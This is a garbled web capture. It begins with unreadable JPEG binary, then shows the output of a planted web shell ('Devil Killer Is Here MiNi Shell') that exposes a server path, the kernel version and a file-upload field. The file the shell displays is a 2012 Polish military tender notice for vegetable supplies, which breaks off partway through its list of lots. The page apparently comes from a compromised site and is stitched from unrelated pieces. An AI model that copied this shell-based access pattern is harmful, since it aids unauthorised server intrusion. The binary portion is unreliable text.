JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120521/112065-N-2012.html

<p class="kh_header"><b>Wałcz: Dostarczanie warzyw gr. I  i warzyw gr. II do jednostek wojskowych 
i ośrodków szkolenia poligonowego</b><br>
<b>Numer ogłoszenia: 112065 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4224 , ul. Ciasna 7, 78-601 Wałcz, woj. zachodniopomorskie, tel. 67 2502184, faks 67 2502184, 2502971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1rblog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostarczanie warzyw gr. I  i warzyw gr. II do jednostek wojskowych 
i ośrodków szkolenia poligonowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr. I  i warzyw gr. II do jednostek wojskowych 
i ośrodków szkolenia poligonowego w asortymencie: 
Buraki ćwikłowe,
Marchew,
Czarna rzepa,
Cebula,
Papryka słodka,
Pomidory,
Ogórki,
Sałata,
Kapusta biała,
Kapusta czerwona,
Kapusta włoska,
Kapusta pekińska,
Kalafior,
Rzodkiewka,
Pietruszka korzeniowa,
Seler korzeniowy,
Por,
Natka pietruszki,
Koperek zielony,
Szczypiorek,
Czosnek,
Pieczarki,
Fasola szparagowa,
Brokuły..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.14-8, 03.22.11.13-1, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.70-9, 03.22.13.10-2, 03.22.14.10-3, 03.22.14.20-6, 03.22.11.00-7, 03.22.10.00-6, 03.22.12.12-5, 03.22.14.30-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium na cały przedmiot zamówienia, w wysokości 
9 528,00 zł.
2.	Zamawiający żąda na poszczególne zadania, wadium w kwotach:
zadanie nr 1 - 52,00 zł.
zadanie nr 2 - 62,00 zł. 
zadanie nr 3 - 243,00 zł. 
zadanie nr 4 - 181,00 zł.
zadanie nr 5 - 32,00 zł.
zadanie nr 6 - 1 598,00 zł.
zadanie nr 7 - 2 971,00zł. 
zadanie nr 8 - 495,00 zł.  
zadanie nr 9 - 417,00 zł.   
zadanie nr 10 -739,00 zł.
zadanie nr 11 - 1 083,00 zł.
zadanie nr 12 - 407,00 zł. 
zadanie nr 13 - 304,00 zł.
zadanie nr 14 - 22,00 zł.
zadanie nr 15 - 269,00 zł.
zadanie nr 16 - 362,00 zł.
zadanie nr 17 - 69,00 zł.
zadanie nr 18 - 167,00 zł. 
zadanie nr 19 - 55,00 zł.  	
3.  Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275).
4. W przypadku wniesienia wadium w formie gwarancji, z jej treści winno wynikać bezwarun-kowe, (na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofer-tą) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okoliczno-ściach określonych w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
5.	Wadium wnoszone w poręczeniach lub gwarancjach bankowych, gwarancjach ubezpiecze-niowych, poręczeniach udzielanych przez podmioty, o których mowa w pkt 3 ppkt 5 należy zdeponować przed terminem składania ofert w kasie Zamawiającego - budynek nr 1 pokój nr 3, a kopię załączyć do oferty (godziny otwarcia kasy: w dni robocze w godzinach: 8.00 -  9.00 i 12.00 - 14.00.). Zamawiający dopuszcza przesłanie oryginału dokumentu za pośrednictwem poczty, w takiej sytuacji dokument należy przesłać na adres Zamawiającego 
z dopiskiem KASA - numer sprawy. Dokument winien być dostarczony Zamawia-jącemu przed terminem składania ofert.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiają-cego: NBP o/o Bydgoszcz nr rach. 47101010780083121391200000
 a) Potwierdzenie wniesienia wadium należy dołączyć do oferty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub inną osobę upoważnioną do reprezentowania Wykonawcy. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiają-cego.
     b) przy wnoszeniu wadium Wykonawca winien podać: nazwę przedmiotu zamówienia, numer sprawy, numer zadania oraz numer swojego konta, na które należy zwrócić wadium.
 7.   Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty naj-korzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zo-stała wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych.
8.   Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wa-dium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.   Zamawiający zwraca niezwłocznie wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia ra-chunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę, na wniosek Wykonawcy który wycofał ofertę przed upływem terminu składania ofert.
10.  Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wa-dium po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli 
w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wy-konawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na we-zwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie-leżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zmawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt. 1 -4 ustawy - wymienionego w załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zmawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt. 1 -4 ustawy - wymienionego w załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zmawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt. 1 -4 ustawy - wymienionego w załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zmawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt. 1 -4 ustawy - wymienionego w załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zmawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt. 1 -4 ustawy - wymienionego w załączniku nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) potwierdzenia wdrożonego systemu HACCP w jednej z następujących form (nie dotyczy rolników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990r. o ubezpieczeniu społecznym rolników - Dz. U. 2008 Nr 50 poz. 291 ze zm.)
-certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju 
albo
-zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010,  Nr 136 , poz. 914 j.t.),
b)	potwierdzenia lub oświadczenia, że Wykonawca oferuje produkty wytworzone w ramach produkcji pierwotnej zgodnie z zasadami GMP (Dobrej Praktyki Produkcji) - dotyczy rol-ników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990r. o ubezpieczeniu społecz-nym rolników - Dz. U. 2008 Nr 50 poz. 291 ze zm.)
c) Oświadczenie,że dostarczany przedmiot zamówienia odpowiada wymaganiom zamieszczonym w załączniku Nr 1 do SIWZ, zatytułowanym Szczegółowy opis przedmiotu zamówienia (załącznik Nr 6).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli one dotyczą: a) zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia, b) wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Wykonawcy, c) zmiany danych Wykonawcy ( np. zmiana siedziby, adresu, nazwy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JW 4224Wałcz,ul. Ciasna 7,78-600 Wałcz. Dokumenty odpłatne 0,15PLN za jedną stronę+koszty przesyłki w przypadku odbioru innego niż osobisty.Prośbę o SIWZ przesłać na adres JW4224 lub fax. 67/2502184...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 09:30, miejsce: Ofertę należy składać w siedzibie Zamawiającego w wałczu, ul Ciasna 7, Kancelaria Jawna. Otwarcie ofert - sala odpraw, budyneknr 1 w dniu 29.05.2012r. o godz. 10:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostarczanie warzyw gr. I do jednostek wojskowych z rejonu: Szczecin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr. I :
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Pietruszka korzeniowa
Seler korzeniowy
Por.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.21.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostarczanie warzyw gr. I do jednostek wojskowych z rejonu: Stargard Szczeciński, Mosty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr. I:
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Pietruszka korzeniowa
Seler korzeniowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Świnujścia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw gr I:
Cebula
Kapusta biała
Por
Natka pietruszki
Koperek zielony
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.13-1, 03.22.14.10-3, 03.22.10.00-6, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa warzyw gr I do jednsotek wojskowych z rejonu: Świdwin, Koszalin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw gr I:
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Kapusta czerwona
Pietruszka korzeniowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Darłowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I:
Cebula
Kapusta biała
Seler korzeniowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.13-1, 03.22.11.00-7, 03.22.14.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych i ośrodków szkolenia poligonowego z rejonu: Złocieniec, Wałcz, Oleszno, Poligon Drawski, Mirosławic..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I: 
Buraki ćwikłowe
Marchew
Cebula
Kapusta biała
Kapusta czerwona
Pietruszka 
korzeniowa
Seler korzeniowy
Por
Natka pietruszki
Koperek zielony
Szczypiorek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Jarocin, Powidz, Poznań..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I:
Buraki ćwikłowe
Marchew
Czarna rzepa
Cebula
Papryka słodka
Pomidory
Ogórki
Kapusta biała
Kapusta czerwona
Kapusta włoska
Kapusta pekińska
Kalafior
Rzodkiewka
Pietruszka korzeniowa
Seler korzeniowy
Por
Natka pietruszki
Koperek zielony
Szczypiorek
Czosnek
Pieczarki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.11.12-4, 03.22.11.14-8, 03.22.11.13-1, 03.22.12.30-7, 03.22.12.40-0, 03.22.12.70-9, 03.22.14.10-3, 03.22.14.20-6, 03.22.11.00-7, 03.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostarczanie warzyw gr I do jednostek wojskowych z rejonu: Wejherowo, Gdynia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostarczanie warzyw gr I:
Buraki ćwikłowe
Marchew
Cebula
Sałata 
Kapusta biała
Kapusta czerwona
Pietruszka korzeniowa
Seler korzeniowy
